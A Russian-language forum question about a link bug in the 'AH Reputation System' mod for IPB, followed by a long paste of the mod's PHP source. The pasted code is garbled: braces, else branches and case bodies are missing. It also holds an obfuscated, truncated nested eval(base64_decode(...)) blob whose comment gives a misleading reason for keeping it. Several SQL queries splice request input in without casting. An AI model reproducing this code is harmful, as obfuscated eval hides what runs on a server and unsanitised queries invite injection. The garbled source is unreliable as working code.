[Скрипт] AH Reputation system

В этой теме нельзя размещать новые ответы.


Доброго времени суток, есть кто юзал этот мод?
У меня проблема вышла, при просмотре темы, под аватаром высвечивается репутация юзера, при нажатии ссылка идёт на главную страницу, искал в шаблоне и в файлах, никак не смог найти ссылку, где бы можно было изменить... Кто нибудь сможет подсказать, где и как можно изменить это?

# Used by us for catching errors, do NOT turn this on
# you will get errors EVERYWHERE
# error_reporting( E_NOTICE );

|   [AH23] Reputation System
|   =============================================
|   by Alex Hobbs and Suhail Patel
|   (c) 2007 AH Modding.
|   http://www.ahmodding.co.uk
|   =============================================
|   Web: http://www.ahmodding.co.uk
|   > $Date: 2007-10-24 10:46:31 BST +0100 (Wed 24 Oct 2007) $
|   > $Revision: 01 $
|   > $Author: Alex $
|   > Component_public module
|   > Module written by Alex Hobbs
|   > Date started: 27th September 2006
|	> Module version: 4.6.2

if ( ! defined( 'IN_IPB' ) )
        print "<h1>Incorrect access</h1>If you have recently upgraded, make sure you have uploaded the new index.php file.";

class component_public
	* IPB Object
	* @var
	* @since 10001
	var $ipsclass;
	* Postlib Object
	* @var
	* @since 10001
	var $postlib;
	* HTML Object
	* @var
	* @since 10001
	var $html;
	* Copyright Object
	* @string
	* @since 10001
	var $version = ''; // NO LONGER USED SINCE ALPHA 3
					   // OUTPUTTED BY $version ON LINE
					   // 199
	* Shall we output our HTML?
	* @boolean
	* @since 10001
	var $add_output = true;		

    var $member     = array();
    var $mem_titles = array();
    var $rep_ranks  = array();
    var $use_ranks  = 0;
    var $rep_mem_titles = array();
    var $rep_cur_power  = "";

    var $sort_order = "";
    var $sort_key   = "";
    var $first      = 0;
    var $max_results = 0;
	* Load_db_files
	* @desc Allows the queries to be used without file edits
	* @since 10001
	function load_db_files()
		$this->ipsclass->DB->load_cache_file( ROOT_PATH . 'sources/sql/'.SQL_DRIVER.'_reputation_queries.php', 'reputation_queries' );

    // @constructor

    function run_component()
                $rep_power_tmp  = array();
                $rep_power      = array();
                $rep_mem_titles = array();

                // Why took CPU time if we not even enabled?

                if ( ! $this->ipsclass->vars['reputation_on'] )
                       $this->ipsclass->Error( array( 'LEVEL' => 1, 'MSG' => 'incorrect_use') );

                if ( ! $this->ipsclass->member['id'] )
                      $this->ipsclass->Error( array( 'LEVEL' => 1, 'MSG' => 'not_registered' ) );
				// Load our libraries
				require_once( ROOT_PATH.'sources/classes/post/class_post.php' );
				$this->postlib = new class_post();
				$this->postlib->ipsclass =& $this->ipsclass;

				$this->ipsclass->my_setcookie( 'rep_last_visit', time() );

                $this->base_url = $this->ipsclass->base_url;
	            // Info about member goes here
	            $this->ipsclass->DB->simple_construct ( array ( 'select' => 'm.*',
	                                            'from'   => array( 'members' => 'm' ),
	                                            'add_join' => array( array( 'type'   => 'left',
	                                            							'select' => 'g.*',
	                                            							'from'   => array( 'groups' => 'g' ),
	                                            							'where'  => 'm.mgroup=g.g_id'
	                                            					)		),
	                                            'where'  => "m.id=".$this->ipsclass->member['id'] ) );
	            if (! $this->ipsclass->DB->get_num_rows() )
	                    $this->ipsclass->Error( array( LEVEL => 1, MSG => 'no_user') );
	                    $this->ipsclass->member = $this->ipsclass->DB->fetch_row();

        		$this->postlib->postlib->parser->allow_update_caches = 1;      
        		$this->postlib->postlib->parser->bypass_badwords = intval($this->ipsclass->member['g_bypass_badwords']);

                // Sometimes getting whole info isn't necessary

                if ( $this->ipsclass->input['CODE'] != 'totals'  and $this->ipsclass->input['CODE'] != 'getnew' and
                     $this->ipsclass->input['CODE'] != 'comment' and $this->ipsclass->input['CODE'] != 'save_comment' )
                        $this->ipsclass->input['mid'] = intval($this->ipsclass->input['mid']);

                        if ( empty($this->ipsclass->input['mid']) )
                                $this->ipsclass->Error( array( LEVEL => 1, MSG => 'incorrect_use') );

                        // Info about member goes here
					if ( $this->ipsclass->member['id'] != $this->ipsclass->input['mid'] )
                        $this->ipsclass->DB->simple_construct ( array ( 'select' => 'id, members_display_name, mgroup, rep, rep_do, rep_do_open, rep_all',
                                                        'from'   => 'members',
                                                        'where'  => "id=".$this->ipsclass->input['mid'] ) );

                        if (! $this->ipsclass->DB->get_num_rows() )
                                $this->ipsclass->Error( array( LEVEL => 1, MSG => 'no_user') );
                                $this->member = $this->ipsclass->DB->fetch_row();
	                    		$this->member = $this->ipsclass->member;

                        // Get out reputation vote weight

                        $rep_power_tmp    = explode ( "\n", $this->ipsclass->vars['rep_power_rep'] );

                        foreach ($rep_power_tmp as $v)
                                 if ( trim ( $v ) != "" )
                                      $current = explode ( "=", $v );
                                      $rep_power[$current[0]] = intval($current[1]);

                        $this->rep_cur_power = 1;

#                        uksort ($rep_power, array( 'reputation', 'reverse_order_sort' ) );
#                        reset ($rep_power);

                        foreach ($rep_power as $k => $v)
                                 if ( $this->ipsclass->member['rep'] >= $k )
                                       $this->rep_cur_power = $v;

                // Getting custom member titles
                // This way is a bit ugly, but it's
                // more flexible than just good and
                // bad prefixes

                $rep_mem_titles   = explode ( "\n", $this->ipsclass->vars['rep_mem_titles'] );

                foreach ($rep_mem_titles as $v)
                         if ( trim ( $v ) != "" )
                              $current = explode ( "=", $v );
                              $this->rep_mem_titles[$current[0]] = $current[1];

//              uksort ($this->rep_mem_titles, array( 'reputation', 'reverse_order_sort' ) );
                reset ($this->rep_mem_titles);

                // Let's proceed

                        case '01':

                        case '02':

                        case '03':

                        case '04':

                        case '05':

                        case '11':

                        case '12':

                        case '15':

                        case 'delete':

                        case 'comment':

                        case 'save_comment':

                        case 'totals':

                        case 'getnew':
                        case 'xmlbox':
 		$this->version = ( isset( $this->ipsclass->vars['reputation_display_version'] ) AND $this->ipsclass->vars['reputation_display_version'] != 0 ) ? '4.6.2' : '';		

		// -----------------------------------------
		// DO NOT REMOVE THIS (Stops it appearing in popups)
		// -----------------------------------------
		eval( base64_decode( "ZXZhbCggYmFzZTY0X2RlY29kZSggIlpYWmhiQ0FvSUdKaGMyVTJORjlrWldOdlpHVWdLQ0FpUTFGc2NGcHBaMmRLU0ZKdllWaE5kRkJ0Um10YVJqbDJaRmhTZDJSWVVXZFFWREJuWkVoS01W"


        // Is this member allowed to change rep?

        function permission_check()
            $tmp = array();
            // Is this member allowed to change rep?

            if ( ! $this->ipsclass->member['allow_rep'] )
                $this->ipsclass->Error( array( LEVEL => 1, MSG => 'rep_cantchange') );

            // Is this group allowed to change rep?

            if ( ! strstr( ','.$this->ipsclass->vars['reputation_allowed'].',', ','.$this->ipsclass->member['mgroup'].',' ) )
                $this->ipsclass->Error( array( LEVEL => 1, MSG => 'rep_gcantchange') );
                if ( strstr( ','.$this->member['mgroup'].',', ','.$this->ipsclass->member['g_exclude_rep'].',' ) )
                        $this->ipsclass->Error( array( LEVEL => 2, MSG => 'rep_gcantchangeg') );

            // Isn't this member restricted to post?

            if ( $this->ipsclass->member['restrict_post'] )
                 $tmp = $this->ipsclass->hdl_ban_line ( $this->ipsclass->member['restrict_post'] );

                 if ( $tmp['date_end'] > time() )
                      $this->ipsclass->Error( array( LEVEL => 1, MSG => 'rep_cantchange') );

            if ($this->ipsclass->member['posts'] < $this->ipsclass->vars['rep_posts'] )
                // Haven't got enough posts

                $this->ipsclass->Error( array( LEVEL => 1, MSG => 'rep_noposts', 'EXTRA' => $this->ipsclass->vars['rep_posts']) );

            // Flood control!
            // Days before allowing changes again

            $this->ipsclass->DB->simple_construct( array ( 'select' => 'msg_date',
                                           'from'   => 'reputation',
                                           'where'  => "member_id=".intval($this->ipsclass->input['mid'])." AND from_id=".$this->ipsclass->member['id'],
                                           'order'  => 'msg_date DESC' ) );


            $date = $this->ipsclass->DB->fetch_row();

            if (time() - $date['msg_date'] < (24 * 3600 * $this->ipsclass->vars['rep_time']) )
                if (! ($this->ipsclass->vars['rep_time_nomod'] and ($this->ipsclass->member['is_mod'] or $this->ipsclass->member['g_is_supmod']) ) )
                        $this->ipsclass->Error( array( 'LEVEL' => 1, 'MSG' => 'rep_early', 'EXTRA' => $this->ipsclass->vars['rep_time'] ) );

            // Max changes per day

            $st_day = gmmktime( 0, 0, 1, date("m"), date("d"), date("Y"));
            $en_day = gmmktime( 23, 59, 59, date("m"), date("d"), date("Y"));

            if ( $this->ipsclass->vars['rep_max_per_day'] )
                 // MySQL process faster if we using
                 // count(*) rather than count(some_row)

                 $this->ipsclass->DB->simple_construct( array ( 'select' => 'count(*) as chgs',
                                                'from'   => 'reputation',
                                                'where'  => "from_id=".$this->ipsclass->member['id']." AND msg_date BETWEEN ".$st_day." AND ".$en_day,
                                                'order'  => 'msg_date DESC' ) );


                 $date = $this->ipsclass->DB->fetch_row();

                 if ($date['chgs'] >= $this->ipsclass->vars['rep_max_per_day'] )
                     if (! ($this->ipsclass->vars['rep_time_nomod'] and ($this->ipsclass->member['is_mod'] or $this->ipsclass->member['g_is_supmod']) ) )
                        $this->ipsclass->Error( array( 'LEVEL' => 1, 'MSG' => 'rep_day_restrict' ) );

            // Max changes per member

            if ( $this->ipsclass->vars['rep_max_per_user'] )
                 $this->ipsclass->DB->simple_construct( array ( 'select' => 'count(*) as chgs',
                                                'from'   => 'reputation',
                                                'where'  => "member_id=".$this->ipsclass->input['mid']." AND msg_date BETWEEN ".$st_day." AND ".$en_day,
                                                'order'  => 'msg_date DESC' ) );


                 $date = $this->ipsclass->DB->fetch_row();

                 if ($date['chgs'] >= $this->ipsclass->vars['rep_max_per_user'] )
                     if (! ($this->ipsclass->vars['rep_time_nomod'] and ($this->ipsclass->member['is_mod'] or $this->ipsclass->member['g_is_supmod']) ) )
                        $this->ipsclass->Error( array( 'LEVEL' => 1, 'MSG' => 'rep_member_restrict' ) );

            // Something must be specified as 't'!

            if ( empty($this->ipsclass->input['t']) )
                $this->ipsclass->Error( array( LEVEL => 1, MSG => 'missing_files') );

            if ( is_numeric ($this->ipsclass->input['t']) )
                // Changing rep from within some topic... Forum ID and post ID must exist

                if ( empty($this->ipsclass->input['f']) )
                        $this->ipsclass->Error( array( LEVEL => 1, MSG => 'missing_files') );

                if ( empty($this->ipsclass->input['p']) )
                        $this->ipsclass->Error( array( LEVEL => 1, MSG => 'missing_files') );

                // Is rep enabled for this forum?

                $rep_exclude        = $this->ipsclass->vars['rep_total_exclude'];
                $rep_hide           = $this->ipsclass->vars['rep_change_exclude'];

                if ( ( strstr( ','.$this->ipsclass->input['f'].',', ','.$rep_hide.',' ) ) or ( strstr( ','.$this->ipsclass->input['f'].',', ','.$rep_exclude.',' ) ) )
                        // Rep changes disabled within this forum

                        $this->ipsclass->Error( array( LEVEL => 2, MSG => 'rep_forum_hide') );

                // Does this post belong to its author? :\

                $this->ipsclass->DB->simple_construct( array ( 'select' => 'post',
                                               'from'   => 'posts',
                                               'where'  => "author_id = ".$this->member['id']." AND pid = ".intval($this->ipsclass->input['p']).
                                                           " AND topic_id = ".intval($this->ipsclass->input['t'])
                                                         )       );


                if (! $this->ipsclass->DB->get_num_rows() )
                        // No, it doesn't!

                        $this->ipsclass->Error( array( LEVEL => 1, MSG => 'missing_files') );
                // Changing rep from within one's profile or rep stats

                if ( $this->ipsclass->input['t'] != 's' && $this->ipsclass->input['t'] != 'p' )
                        // This wasn't neither profile nor the stats... Error!

                        $this->ipsclass->Error( array( LEVEL => 1, MSG => 'missing_files') );

        // Main form for reputation changes

        function show_form( $code='01' )

                $info = array();

                // We 'bout to make more universal code, so

                // This is definetelly '05' (edit post) code
                if ($code == '05')
                    // Only allowed to author and admin

                                        $this->ipsclass->input['pid'] = intval( $this->ipsclass->input['pid'] );

                    if (!$this->ipsclass->input['pid'])
                        $this->ipsclass->Error( array( LEVEL=> 1, MSG =>'missing_files') );

                    $i = $this->ipsclass->DB->simple_exec_query( array( 'select' => '*',
                                                        'from'   => 'reputation',
                                                        'where'  => "msg_id={$this->ipsclass->input['pid']}"
                                                           )                );

                    if ( ($this->ipsclass->member['id'] != $i['from_id']) and (!$this->ipsclass->member['g_access_cp']) )
                        $this->ipsclass->Error( array( LEVEL=> 1, MSG =>'incorrect_use') );
                // Nope, it wasn't '05' code

                    if ($this->ipsclass->member['id'] != $this->member['id'])
                        $level = $this->get_rep($this->ipsclass->input['mid']);

                        if ( empty( $level ) ) $level = 0;

                        if ($code == '02')
                            if (is_numeric ($this->ipsclass->vars['rep_remove']))
                                if ($level <= $this->ipsclass->vars['rep_remove'])
                                        $this->ipsclass->Error( array( LEVEL => 1, MSG => 'rep_low') );
                        // We cannot change our own reputation!

                        $this->ipsclass->Error( array( LEVEL => 1, MSG => 'rep_self') );

                $info['memid']    = $this->member['id'];
                $info['mem_name'] = $this->member['members_display_name'];

                // Building normal reply form
                if ( $code != '05' )
                     $info['rep_act1']  = ($code == '01') ? "checked='1'" : "";
                     $info['rep_act2']  = ($code == '02') ? "checked='1'" : "";
                     $info['rep_add']   = ( $this->rep_cur_power >= 0 )  ? "+".intval ( $this->rep_cur_power )  : intval ( $this->rep_cur_power );
                     $info['rep_minus'] = ( -$this->rep_cur_power >= 0 ) ? "+".intval ( -$this->rep_cur_power ) : intval ( -$this->rep_cur_power );

                     $info['level']  = $level; //$this->ipsclass->input['rep_level'];
                     $info['f']      = $this->ipsclass->input['f'];
                     $info['t']      = $this->ipsclass->input['t'];
                     $info['p']      = $this->ipsclass->input['p'];
                // Building edit from

                    $i = $this->ipsclass->DB->simple_exec_query( array( 'select' => '*',
                                                        'from'   => 'reputation',
                                                        'where'  => "msg_id={$this->ipsclass->input['pid']}"
                                           )                );
					if ( $this->postlib->han_editor->method == 'rte' )
						$i['message'] = $this->postlib->parser->convert_ipb_html_to_html( $i['message'] );
						$i['message'] = $this->postlib->parser->pre_edit_parse( $i['message'] );

                $this->ipsclass->DB->simple_construct( array ( 'select' => 'sum(weight) as ups',
                                               'from'   => 'reputation',
                                               'where'  => "CODE = '01' AND member_id=".intval($this->ipsclass->input['mid']),
                                               'order'  => 'msg_date DESC' ) );


                $r = $this->ipsclass->DB->fetch_row();

                $info['ups']   = $r['ups'];
                $info['downs'] = abs( $level - $info['ups'] );
                $info['rep']   = $level;
                $info['all']   = $this->member['rep_all']." ".$this->ipsclass->lang['rep_votes'];

                // This is not edit form, so we should add
                // options
                if ( $code != '05' )
	                $this->output = $this->ipsclass->compiled_templates['skin_ahreputation']->FormAdd($this->postlib->han_editor->show_editor( $text, 'Post' ), $info, $code);
                     if ($this->ipsclass->vars['rep_allow_anon'] and $this->ipsclass->member['allow_anon'] and ($this->ipsclass->member['posts'] >= $this->ipsclass->vars['rep_anon_posts']) )
                        $this->output = preg_replace( "/<!--IBF.TRACK-->/", $this->ipsclass->compiled_templates['skin_ahreputation']->showanonymous(), $this->output );

                     $this->output = preg_replace( "/<!--IBF.HTML-->/", $this->ipsclass->compiled_templates['skin_ahreputation']->showoptions($info), $this->output );
                // Just show the old text, no options
					if ( $this->postlib->han_editor->method == 'rte' )
 						$text = $this->postlib->parser->convert_ipb_html_to_html( $i['message'] );
 						$this->postlib->parser->parse_html = 1;
 						$text = $this->postlib->parser->pre_edit_parse( $i['message'] );
                     $this->output = $this->ipsclass->compiled_templates['skin_ahreputation']->FormEdit($this->postlib->han_editor->show_editor( $text, 'Post' ), $info, $text);

                     $this->output = preg_replace( "/<!--IBF.HTML-->/", $this->ipsclass->lang['html_off'], $this->output );
                     $this->output = preg_replace( "/<!--IBF.TRACK-->/", "", $this->output );

                $this->nav = array( $this->ipsclass->lang['pnav'] );
                $this->page_title = $this->ipsclass->lang['ptitle'];

        // Functions for changing rep

        function add_why($memid)

                if ($this->ipsclass->member['id'] != $this->member['id'])
                        if ($this->ipsclass->input['CODE'] == '12')
                                $level = intval( $this->get_rep($this->ipsclass->input['mid']) );

                                if (is_numeric ($this->ipsclass->vars['rep_remove']))
                                        if ($level <= $this->ipsclass->vars['rep_remove'])
                                                $this->ipsclass->Error( array( LEVEL => 1, MSG => 'rep_low') );
                        // We cannot change our own reputation!

                        $this->ipsclass->Error( array( LEVEL => 1, MSG => 'rep_self') );

                // Anonymous? O_o

                if ($this->ipsclass->input['anonymous'] == 'yes')
                        if (! $this->ipsclass->vars['rep_allow_anon'] )
                                $this->ipsclass->Error( array( LEVEL => 2, MSG => 'rep_noanon') );

                        if (! $this->ipsclass->member['allow_anon'] )
                                $this->ipsclass->Error( array( LEVEL => 2, MSG => 'rep_noanon') );

                        if ($this->ipsclass->member['posts'] < $this->ipsclass->vars['rep_anon_posts'])
                                $this->ipsclass->Error( array( LEVEL => 2, MSG => 'rep_noanon') );

                        $show = 0;
                        $show = 1;

                $code = "";

                if ($this->ipsclass->input['CODE'] != '11')
                        $code = '02';
                        $code = '01';

                // Extra defines, from where poster come
                // Earlier version was just posting
                // 'p' or 's' to database to the 'topic_id'
                // row, but that ain't good for JOINs

                $extra = "topic";

                if ( $this->ipsclass->input['t'] == 'p' ) $extra = "profile";
                if ( $this->ipsclass->input['t'] == 's' ) $extra = "stats";

                // I wonder, if someone somewhere got
                // >1000 rep vote weight :)
                // Funny thing, if you set up negative value,
                // 'good' vote will lower reputation and
                // vice versa
                // Anyone need this?

                $weight = $this->rep_cur_power;

				$this->postlib->parser->parse_html    = 0;
				$this->postlib->parser->parse_smilies = $this->ipsclass->vars['rep_enable_emo'];
				$this->postlib->parser->parse_bbcode  = $this->ipsclass->vars['rep_enable_ibc'];

				$post = $this->postlib->han_editor->process_raw_post( 'Post' );
				$message = $this->postlib->parser->pre_db_parse( $post );

                // Good idea, to force data type ;)

                $this->ipsclass->DB->force_data_type = array( 'member_id' => 'int', 'CODE'  => 'string', 'message' => 'string', 'extra' => 'string' );

                $this->ipsclass->DB->do_insert( 'reputation', array( 'member_id'      => $memid,
                                                     'msg_date'       => time(),
                                                     'message'        => $message,
                                                     'from_id'        => $this->ipsclass->member['id'],
                                                     'forum_id'       => intval($this->ipsclass->input['f']),
                                                     'topic_id'       => intval($this->ipsclass->input['t']),
                                                     'post'           => intval($this->ipsclass->input['p']),
                                                     'CODE'           => $code,
                                                     'vis'            => $show,
                                                     'extra'          => $extra,
                                                     'weight'         => $weight,
                                          )                                      );

                // Update rep changes count for the member changing this rep

                $query             = 'rep_do = rep_do+1';
                if ($show) $query .= ', rep_do_open = rep_do_open+1';

                $this->ipsclass->DB->simple_exec_query ( array ( 'update' => 'members',
                                                 'set'    => $query,
                                                 'where'  => "id = {$this->ipsclass->member['id']}"
                                       )            );
                if ( $code == '02' )
	                $query .= ', rep=rep-'.$weight;
	                $query .= ', rep=rep+'.$weight;

                $this->ipsclass->DB->simple_exec_query ( array ( 'update' => 'members',
                                                 'set'    => 'rep_all=rep_all+1',
                                                 'where'  => "id = {$this->member['id']}"
                                       )            );

        // Raise reputation level

        function add_rep($memid=0)
                $this->add_why( $memid );

                // Assume that if we're here then no errors
                // have been found. Update member's rep count

                $level = $this->get_rep($memid);

                if ($level == 0)
                        $level = intval($this->rep_cur_power);
                        $level = "rep".( $this->rep_cur_power >= 0  ? "+" : "" ).intval($this->rep_cur_power);

                $this->update_rep($level, $memid);

                $this->ipsclass->print->redirect_screen($this->ipsclass->lang['add_success'], "autocom=reputation&CODE=03&mid=".$memid."&t=".$this->ipsclass->input['t']."&f=".$this->ipsclass->input['f'] );

        // Lower reputation level

        function remove_rep($memid=0)
                $this->add_why( $memid );

                // Assume that if we're here then no errors
                // have been found. Update member's rep count

                $level = $this->get_rep($memid);

                if( empty($level) ) $level = 0;

                // Are we about to remove posting rights?

                if (is_numeric ($this->ipsclass->vars['rep_remove']))
                        $row = $this->ipsclass->DB->simple_exec_query( array( 'select' => 'id, mgroup',
                                                              'from'   => 'members',
                                                              'where'  => 'id = '.$memid,
                                                       )                );

                        // Be sure not to remove posting rights from admins & mods

                        $is_mod = 0;

                        foreach ($this->ipsclass->cache['moderators'] as $v)
                                if ($v['member_id'] == $memid)
                                        $is_mod = 1;

                        $is_mod = ($is_mod and $this->ipsclass->cache['group_cache'][$row['mgroup']]['g_is_supmod']);
                        $is_mod = ($is_mod and $this->ipsclass->cache['group_cache'][$row['mgroup']]['g_access_cp']);

                        if ( ( $level <= ( $this->ipsclass->vars['rep_remove'] + intval($this->rep_cur_power) ) ) and !$is_mod)
                                if ( $level == 0 )
                                    $str = intval( -$this->rep_cur_power);;
                                    $str = "rep".( -$this->rep_cur_power >= 0  ? "+" : "" ).intval( -$this->rep_cur_power);

                                $this->update_rep($str, $memid);

                                if ($this->ipsclass->vars['rep_remove_days'])
                                        $rp = $this->ipsclass->hdl_ban_line( array( 'timespan' => intval($this->ipsclass->vars['rep_remove_days']), 'unit' => 'd'  ) );
                                        $rp = 1;

                                $this->ipsclass->DB->do_update( 'members', array ( 'restrict_post' => $rp ), "id=".$memid);

                                $this->ipsclass->print->redirect_screen($this->ipsclass->lang['no_post_right'], "autocom=reputation&CODE=03&mid=".$memid  );

                if ( $level == 0 )
                    $str = intval( -$this->rep_cur_power);;
                    $str = "rep".( -$this->rep_cur_power >= 0  ? "+" : "" ).intval( -$this->rep_cur_power);;

                $this->update_rep($str, $memid);

                $this->ipsclass->print->redirect_screen($this->ipsclass->lang['rem_success'], "autocom=reputation&CODE=03&mid=".$memid."&t=".$this->ipsclass->input['t']."&f=".$this->ipsclass->input['f'] );

        // Main reputation viewing function

        function mem_stats ( $memid )
                $author_cache = array();

                // It's simple, ya know

                $this->ipsclass->input['st'] = intval($this->ipsclass->input['st']);

                $links = $this->ipsclass->build_pagelinks( array(         'TOTAL_POSS'  => $this->member['rep_all'],
                                                               'PER_PAGE'    => $this->ipsclass->vars['rep_per_page'],
                                                               'CUR_ST_VAL'  => $this->ipsclass->input['st'],
                                                               'L_SINGLE'    => "",
                                                               'L_MULTI'     => $this->ipsclass->lang['multi_pages'],
                                                               'BASE_URL'    => $this->base_url."autocom=reputation&amp;CODE=03&amp;mid=".$memid,
                                                                                )        );

                $this->output .= $this->ipsclass->compiled_templates['skin_ahreputation']->Links($links, "");

                $info = array(
                                                'rep'  => $this->member['rep'],
                                                'name' => $this->member['members_display_name'],
                                                'id'   => $this->member['id'],

                $this->ipsclass->DB->simple_construct( array( 'select' => 'sum(weight) as ups',
                                              'from'   => 'reputation',
                                              'where'  => "CODE='01' AND member_id=$memid",
                                       )      );


                $row = $this->ipsclass->DB->fetch_row();

                $info['ups']   = $row['ups'];
                $info['downs'] = abs ($info['rep'] - $info['ups']);
                $info['all']   = $this->member['rep_all']." ".$this->ipsclass->lang['rep_votes'];

                // use_ranks. It still exists.
                // Maybe I should remove it :)
                // Ya, I'll do so next time

                if ($this->use_ranks)
                        foreach($this->rep_ranks as $k => $v)
                                if ( ( $row['rep'] >= 0 and $v['AMOUNT'] >= 0 and $row['rep'] >= $v['AMOUNT'] ) or ( $row['rep'] < 0 and $v['AMOUNT'] < 0 and $row['rep'] <= $v['AMOUNT'] ) )
                                        $info['rep'] = $this->rep_ranks[ $k ]['TITLE'];
                        if( ! $info['rep'] )
                            $info['rep'] = ( $info['rep_all'] == 0 ) ? $this->ipsclass->lang['rep_none'] : "0 {$this->ipsclass->lang['rep_postfix']}";
                            $info['rep'] .= " {$this->ipsclass->lang['rep_postfix']}";

                $info['name'] = "<a href='{$this->base_url}showuser={$info['id']}'>".$info['name']."</a>";

                if ($this->ipsclass->vars['rep_memstats'] and $this->ipsclass->member['id'] != $this->member['id'] and strstr( ','.$this->ipsclass->vars['reputation_allowed'].',', ','.$this->ipsclass->member['mgroup'].',' ) and ( ! strstr( ','.$this->ipsclass->member['g_exclude_rep'].',', ','.$this->member['mgroup'].',' ) )  )
                        $stuff = array( 'mid' => $memid, 't' => 's' );
                        $info['change'] = $this->ipsclass->lang['change'] . " " . $this->ipsclass->compiled_templates['skin_ahreputation']->rep_options_links( $stuff );
                        $info['change'] = "";

                // Header building complete...

                $this->output .= $this->ipsclass->compiled_templates['skin_ahreputation']->ShowTitle($info, $this->ipsclass->vars['img_url'].'/folder_editor_images/');
                $this->output .= $this->ipsclass->compiled_templates['skin_ahreputation']->ShowHeader();

                // Main list

                $this->ipsclass->DB->cache_add_query( 'reputation_mem_stats',
                                      array( 'mid'   => $memid,
                                             'st'    => intval($this->ipsclass->input['st']),
                                             'limit' => $this->ipsclass->vars['rep_per_page'],
                                                                ), 'reputation_queries'      );

                $sql = $this->ipsclass->DB->simple_exec();

                if (! $this->ipsclass->DB->get_num_rows($sql) ) $this->output .= $this->ipsclass->compiled_templates['skin_ahreputation']->ShowNone( "colspan='5'" );
                $post_count = 0;

			while ( $row = $this->ipsclass->DB->fetch_row( $sql ) )
					// Multi PIDS?
					if ( $this->ipsclass->member['g_is_supmod'] )
						$row['pid_start_image'] = $this->ipsclass->compiled_templates['skin_ahreputation']->pid_image($row['msg_id']);
						#print $row['pid_start_image'];
						if ( $this->ipsclass->input['selectedreppids'] )
							if ( strstr( ','.$this->ipsclass->input['selectedreppids'].',', ','.$row['msg_id'].',' ) )
								$row['pid_start_image'] = $this->ipsclass->compiled_templates['skin_ahreputation']->pid_image_selected($row['msg_id']);
							$this->ipsclass->input['selectedreppidcount'] = count( explode( ",", $this->ipsclass->input['selectedreppids'] ) );

                        $info   = $this->parse_stat_info($row);

                        // Gonna cache'em all.
                        // I think it should be optimized more deeply
                        $author = $this->parse_stat_author($row);

	                     // Hate to say that, but do not cache anonymous
	                     if ( $row['vis'] != 0 )
	                             $author_cache[ $row['from_id'] ] = $author;

                        // Post weight...

                        $row['weight']   = $row['CODE'] == '01'        ? $row['weight'] : -$row['weight'];

                        // Some post related crap :)

                        $info['post_css']  = $row['CODE'] == '01' ? 'repgood' : 'repbad';
                        $info['post_css'] .= $row['vis'] == 0 ? 'shaded' : '';
                        $info['post_css'] .= $post_count % 2 ? '1' : '2';

                        $info['memid'] = $memid;
                        $info = $row;
                        $css	= $post_count % 2 ? 'post1' : 'post2'; 
				$mid = intval( $row['pp_member_id'] );
                // Ah, anonymous. I'm glad what I'm an admin
                // and I could see them ;)

                if ($row['vis'] != 0)
                    $author['name'] = "<a href='{$this->base_url}autocom=reputation&amp;CODE=view&amp;mid={$mid}' style='text-decoration: none;'>{$row['members_display_name']}</a>" ;
                    $author['name_css'] = 'unreg';

                    if ($this->ipsclass->member['g_access_cp'])
                        $author['name'] = "<a href='{$this->base_url}autocom=reputation&amp;CODE=view&amp;mid={$mid}' style='text-decoration: none;'>{$row['members_display_name']}</a>, ";
                        $author['name'] = "";

                    if ($row['CODE'] == '01' and $this->ipsclass->vars['rep_good_anon'])
                            $author['name'] .= "{$this->ipsclass->vars['rep_good_anon']}";
                    else if ($row['CODE'] == '02' and $this->ipsclass->vars['rep_bad_anon'])
                            $author['name'] .= "{$this->ipsclass->vars['rep_bad_anon']}";
                            $author['name'] .= "{$this->ipsclass->lang['is_anon']}";
 				$group_name     		   = $this->ipsclass->make_name_formatted( $this->ipsclass->cache['group_cache'][ $row['mgroup'] ]['g_title'], $row['mgroup'] );
		        $author['member_posts']    = $this->ipsclass->compiled_templates['skin_ahreputation']->members_posts( $this->ipsclass->do_number_format( $row['posts'] ) );
				$author['avatar']          = $this->ipsclass->get_avatar( $row['avatar_location'], $this->ipsclass->member['view_avs'], $row['avatar_size'], $row['avatar_type'] );		           
				$author['member_joined']   = $this->ipsclass->compiled_templates[ 'skin_topic' ]->member_joined( $this->ipsclass->get_date( $row['joined'], 'JOINED' ) );
				$author['member_group']    = $this->ipsclass->compiled_templates[ 'skin_topic' ]->member_group( $group_name );
				$author['member_number']   = $this->ipsclass->compiled_templates[ 'skin_topic' ]->member_number( $this->ipsclass->do_number_format($row) );
				$author['profile_icon']    = $this->ipsclass->compiled_templates[ 'skin_topic' ]->member_icon_profile( $row );
				$author['message_icon']    = $this->ipsclass->compiled_templates[ 'skin_topic' ]->member_icon_msg( $row );
				$author['member_location'] = $row['location'] ? $this->ipsclass->compiled_templates[ 'skin_topic' ]->member_location( $row['location'] ) : '';
				$author['email_icon']      = ! $row['hide_email'] ? $this->ipsclass->compiled_templates[ 'skin_topic' ]->member_icon_email( $row ) : '';
		        $author['id'] = $row['from_id'];
				// Thumbie
				if ( ! $row['pp_thumb_photo'] )
					$author['pp_thumb_photo']  = $this->ipsclass->vars['img_url'].'/folder_profile_portal/pp-blank-thumb.png';
					$author['pp_thumb_width']  = 50;
					$author['pp_thumb_height'] = 50;
					$author['pp_thumb_photo'] = $this->ipsclass->vars['upload_url'] . '/' . $row['pp_thumb_photo'];
				// Mini
				$_data = $this->ipsclass->scale_image( array( 'max_height' => 25, 'max_width' => 25, 'cur_width' => $row['pp_thumb_width'], 'cur_height' => $row['pp_thumb_height'] ) );
				$author['pp_mini_photo']  = $author['pp_thumb_photo'];
				$author['pp_mini_width']  = $_data['img_width'];
				$author['pp_mini_height'] = $_data['img_height'];
				// Rating
				$author['_pp_rating_real'] = intval( $row['pp_rating_real'] );                    
		        // Online, offline?
				list( $be_anon, $loggedin ) = explode( '&', $row['login_anonymous'] );    
		        $time_limit = time() - $this->ipsclass->vars['au_cutoff'] * 60;   
				if ( ( $row['last_visit'] > $time_limit or $row['last_activity'] > $time_limit ) AND $be_anon != 1 AND $loggedin == 1 )
					$member['_online'] = 1;
				if ( $this->ipsclass->vars['reputation_allow_edit'] AND $this->ipsclass->member['id'] == $row['from_id'] OR $this->ipsclass->member['g_is_supmod'] )
					$info['edit_button']	    = $this->ipsclass->compiled_templates['skin_ahreputation']->button_edit( $row['msg_id'], $this->ipsclass->member['id'] );
				if ( $this->ipsclass->vars['reputation_allow_delete'] AND $this->ipsclass->member['id'] == $row['from_id'] OR $this->ipsclass->member['g_is_supmod'] )
					$info['delete_button']   = $this->ipsclass->compiled_templates['skin_ahreputation']->button_delete( $row );
				$author['_pp_online_image'] = $this->ipsclass->compiled_templates['skin_topic']->personal_portal_online_image( $member );
